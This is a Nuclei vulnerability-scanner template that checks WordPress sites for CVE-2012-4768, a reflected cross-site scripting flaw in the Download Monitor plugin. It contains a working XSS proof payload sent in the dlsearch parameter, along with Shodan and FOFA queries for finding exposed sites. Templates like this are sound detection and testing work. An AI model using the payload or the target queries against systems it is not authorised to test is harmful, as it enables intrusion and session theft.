nuclei-templates/http/cves/2012/CVE-2012-4768.yaml

67 lines
2.5 KiB
YAML

id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4768
- http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt
- http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/78422
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2012-4768
cwe-id: CWE-79
epss-score: 0.00922
epss-percentile: 0.82559
cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: mikejolley
product: "download_monitor"
framework: wordpress
shodan-query: "http.html:\"/wp-content/plugins/download-monitor/\""
fofa-query: "body=\"/wp-content/plugins/download-monitor/\""
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Download Monitor ='
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100daff72673225c1d5295cf598ad635b40a32ac87c4997268008e72526606b0dd602202b6a0b28d688f686fa7cc48e1362b713eb04eea95e138a13e9acd1ba27d2f2f9:922c64590222798bb761d5b6d8e72950